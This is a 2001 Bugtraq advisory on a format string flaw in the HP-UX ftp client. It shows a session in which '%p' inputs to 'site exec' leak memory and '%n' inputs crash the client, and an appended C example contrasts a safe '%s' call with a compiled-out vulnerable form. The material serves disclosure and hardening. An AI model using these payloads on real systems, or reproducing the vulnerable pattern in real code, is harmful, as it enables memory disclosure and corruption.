Bugtraq mailing list archives

HP/UX FTP format string vulnerability
From: "[ zorgon ]" <zorgon () ANTIONLINE ORG>
Date: Mon, 8 Jan 2001 13:55:53 -0800

A format string vulnerability exists in ftp. This vulnerability was
discussed with HP labs.

$ uname -a
HP-UX hpotac8 B.11.00 A 9000/785 2004901631 licence pour deux utilisateurs
$ ftp localhost
Connected to localhost.
220 localhost FTP server (Version Wed Feb  9 08:03:34 GMT 2000) ready.
Name (localhost:zorgon):zorgon
331 Password required for zorgon.
230 User zorgon logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> site exec %p %p %p %p
200-40008f10 00000003 00000002 00000001
200  (end of '40008f10 00000003 00000002 00000001')
ftp> site exec %n %n %n %n
Bus error(coredump)

The 'SITE' command is also vulnerable:
ftp> site %p %p %p %p
500 'SITE 40008F0C 00000002 00000002 00000001': command not understood.
ftp> site %n %n %n %n
Bus error(coredump)
$ file core
core:           fichier de vidage de la memoire de'ftp' - recu SIGBUS

The character format strings are not being parsed correctly in the ftp client.
When HP labs fixes the problem in the client, the result will be:

ftp>  site exec %n %n %n %n
--->  SITE exec %n %n %n %n
200-%n %n %n %n
200  (end of '%n %n %n %n')

So in this case the ftpd server will not process the character format strings.
The fix will be made in the next release of the ftp client.

zorgon <zorgon () antionline org>
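
The behaviour the post expects after the fix (the reply echoed as literal text) is what a constant "%s" format gives. The following is an added example, not code from the original post or from HP; the function names are hypothetical and it assumes the defect is the usual pattern of passing untrusted text as the format argument of a printf-family call.

```c
#include <stdio.h>
#include <string.h>

/* Constructed sample: the reply line from the post's expected post-fix output. */
static const char SAMPLE_REPLY[] = "200-%n %n %n %n";

/* Hardened form: the reply is an argument to a constant "%s" format, so any
 * '%' sequences inside it are copied as plain bytes and never interpreted. */
int render_reply(char *out, size_t outlen, const char *reply)
{
    return snprintf(out, outlen, "%s", reply);
}

#ifdef SHOW_VULNERABLE_FORM
/* Vulnerable form (assumed pattern, compiled out by default): the reply is
 * itself the format string, so %p reads and %n writes through arguments
 * that were never passed. Builds with -Wformat-security flag this call. */
int render_reply_unsafe(char *out, size_t outlen, const char *reply)
{
    return snprintf(out, outlen, reply);
}
#endif

/* Audit helper: count conversion directives in untrusted text.
 * "%%" is an escaped percent sign and is not counted. */
int count_directives(const char *s)
{
    int n = 0;
    for (; *s; s++) {
        if (*s != '%') continue;
        if (s[1] == '%') { s++; continue; }
        if (s[1] != '\0') n++;
    }
    return n;
}

int main(void)
{
    char line[128];
    render_reply(line, sizeof line, SAMPLE_REPLY);
    printf("%s\n", line);
    printf("directives in untrusted text: %d\n", count_directives(SAMPLE_REPLY));
    return 0;
}
```
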
